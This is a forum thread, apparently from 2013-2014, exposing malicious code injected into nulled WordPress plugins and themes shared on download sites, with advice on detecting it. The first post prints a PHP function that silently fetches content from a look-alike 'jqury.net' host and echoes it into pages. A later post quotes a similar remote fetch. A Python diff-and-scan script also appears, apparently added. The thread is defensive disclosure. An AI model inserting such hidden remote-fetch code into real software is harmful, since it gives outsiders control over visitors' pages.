
Poll: Have you ever been affected by an infected shared script or theme?
Yes, and I will be more alert
Nope, and I will be more alert

06-15-2013, 12:17 PM (This post was last modified: 06-15-2013 12:31 PM by enmedallo.)
Post: #1
WPLOCKER.COM EXPOSED Infected Themes and Scripts
I've been running some file comparisons lately between WP plugins shared on some sites, especially WPLOCKER.COM, and the same plugins bought by me personally [clean and ethical code from the authors themselves].

We all know wplocker.com because they like to put the phrase "Shared On WPLOCKER.COM" all over the code, nagging our workflow with the plugins. But that is nothing compared to other code these guys like to add to the script.

I have used the software WinMerge so I can compare 2 unzipped folders and easily detect the changes made. The malicious code added changes from season to season, I guess, to make it difficult for someone aware of this to find it. The code I've found is this:

Code:
function wp__head() {
    if (function_exists('curl_init')) {
        // Fetch content from the misspelled host, sending this site's host name as the referer
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "http://www.jqury.net/?1");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        $jquery = curl_exec($ch);
        curl_close($ch);
        // Echo whatever the remote server returned into the page output
        echo "$jquery";
    }
}


If you are clever enough, the first thing you'll notice is, of course, the misspelling of the jQuery site: it is written 'jqury.net'. So maybe someone reading the code will let it pass. Sometimes the 'extra malicious' code will break the plugin, making it unusable (something good; at least it is a sign of something going wrong!), but all the time, this code will run inside your WP plugin installation process and execute who knows what...

Quote: I PROPOSE TO UPDATE THIS THREAD WITH THE MISSPELLED STRINGS OR KEYWORDS YOU FIND, TO SCAN THE DOWNLOADED FILES AND BE A LITTLE CLOSER TO AT LEAST KNOWING THAT THE FILES WE DOWNLOAD ARE FREE OF MALICIOUS CODE, AND TO DENOUNCE THOSE SITES WHO SHARE THESE FILES, SO WE ARE MORE ALERT NEXT TIME WE GOOGLE FOR A PLUGIN OR THEME AND FIND THEM "NULLED".
PLEASE READ THE NEXT POST TO KNOW MORE ABOUT INFECTED PLUGINS AND THEMES:
http://bestblackhatforum.com/Thread-Be-C...INS-THEMES

This thread contains a POLL so you can tell if you have been affected by infected shared plugins and themes.
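The folder comparison and keyword scan described in post #1 can be scripted. The following is an added example, not part of the original post: it diffs a clean plugin tree against a downloaded copy and reports added lines that make outbound fetches or reference a look-alike host. The `KNOWN_NAMES` list, the 0.8 similarity threshold and the sample files in `demo()` are assumptions constructed for illustration.

```python
import difflib
import re
import tempfile
from pathlib import Path

# Assumption: names the clean plugins legitimately reference; extend for your own set.
KNOWN_NAMES = ["jquery", "wordpress", "googleapis"]
FETCH_CALL = re.compile(r"\b(curl_\w+|file_get_contents|fsockopen|wp_remote_get)\s*\(")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

def lookalike(host):
    """Return the known name this host imitates (close but not equal), else None."""
    labels = host.lower().strip(".").split(".")
    name = labels[-2] if len(labels) >= 2 else labels[0]  # naive: ignores co.uk-style suffixes
    for known in KNOWN_NAMES:
        if name != known and difflib.SequenceMatcher(None, name, known).ratio() >= 0.8:
            return known
    return None

def added_lines(clean_file, suspect_file):
    """Lines present in the suspect copy but not in the clean one."""
    old = clean_file.read_text(errors="replace").splitlines() if clean_file.is_file() else []
    new = suspect_file.read_text(errors="replace").splitlines()
    return [d[2:] for d in difflib.ndiff(old, new) if d.startswith("+ ")]

def scan(clean_dir, suspect_dir):
    """Compare two unzipped trees; return (file, kind, detail) for risky additions."""
    clean_dir, suspect_dir = Path(clean_dir), Path(suspect_dir)
    findings = []
    for path in sorted(suspect_dir.rglob("*.php")):
        rel = path.relative_to(suspect_dir)
        for line in added_lines(clean_dir / rel, path):
            if FETCH_CALL.search(line):
                findings.append((str(rel), "remote-fetch", line.strip()))
            for host in URL_HOST.findall(line):
                kind = "lookalike-host" if lookalike(host) else "new-host"
                findings.append((str(rel), kind, host))
    return findings

def demo():
    """Constructed sample: a clean plugin file and a tampered copy of it."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, bad = Path(tmp, "clean"), Path(tmp, "nulled")
        for d in (clean, bad):
            d.mkdir()
        body = "<?php\nfunction my_plugin_init() { return true; }\n"
        (clean / "plugin.php").write_text(body)
        (bad / "plugin.php").write_text(body + '$ch = curl_init();\n'
            'curl_setopt($ch, CURLOPT_URL, "http://www.jqury.net/?1");\n')
        return scan(clean, bad)
```

Files that exist only in the downloaded copy are treated as entirely added, so a dropped-in extra PHP file is scanned in full.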
06-15-2013, 12:47 PM
Post: #2
RE:
Nice share
06-15-2013, 02:51 PM
Post: #3
RE:
WHAT WE NEED IS A BOT THAT SCANS THEMES! AFTER SCANNING! INSTALL!
03-24-2014, 08:44 AM
Post: #4
RE:
Try this http://wordpress.org/plugins/tac/
03-24-2014, 12:07 PM
Post: #5
RE:
http://wordpress.org/plugins/gotmls/
03-24-2014, 10:58 PM
Post: #6
RE:
Apart from the official WordPress repository, there are hundreds and thousands of websites which provide free WordPress themes and plugins, but the problem is you cannot always trust them. Yes, most of them add malicious code to themes and plugins which is not too easy for you to find out. Before learning about the cure, let's discuss the cause.

Here is why they add their custom codes
  • To get backlink from your blog unknowingly
  • To get access to your blog
  • To redirect your blog to spam links
  • To add their advertisements and banners.
  • or to simply get your website down
Not only free themes and plugins: the premium nulled plugins and themes that you have downloaded from DOWNLOAD and torrents may also be infected by these malicious codes.

Detecting Malicious codes
After downloading the plugin or theme, the first thing you should do is check for viruses, trojans and other worms that you may not like.
Check for Virus and Trojans
Go to VirusTotal.com and upload the zip file to check for virus.
If your file is infected you will get a red signal and if not then you can move on to next step.

[Image: Antivirus-scan-VirusTotal.png] VirusTotal Scan result
Check for unwanted codes in Plugins
Now let's check for unwanted codes in plugins using another WordPress plugin called Exploit Scanner, which can be securely downloaded from the WordPress website.
After installing it, go to Dashboard >> Tools >> Exploit Scanner and run the scan. It will take some time to complete the scan, and the time depends on the number of plugins you have installed.
After the scan you can see a list of codes that are suspected. You can use the browser search function to find the plugins that you installed from outside the WordPress repository.

[Image: Exploit-Scanner-1024x316.png] Exploit Scanner
Note: This plugin will also scan themes, but you might be interested to try the tip that I am about to give next.

Check for Theme authenticity
Adding a backlink in a free theme is a very common technique, but you can easily find those exploited themes with the plugin called Theme Authenticity Checker (TAC).

Install the plugin and go to Dashboard >> Appearance >> TAC

You can see the list of themes installed with their authenticity result. It will give a warning if any encrypted links are found in a theme.

[Image: TAC.jpg]
03-25-2014, 01:18 AM (This post was last modified: 03-25-2014 01:30 AM by Smosh.)
Post: #7
RE:
Just checked my website after reading this post, as it had been hacked three times before. I found exploits in most of the plugins and themes, even those which were downloaded from other websites, including this one.

Found this on a script from i2share

<?php
$tmp = @file_get_contents('http://www.i2share.com/license_check.php?key=' . urlencode($key));
echo $tmp;
?>
03-25-2014, 02:20 AM (This post was last modified: 03-25-2014 02:21 AM by wprocker.)
Post: #8
RE:
Nice share!
I have downloaded several themes from there, I need to check for this

Thanks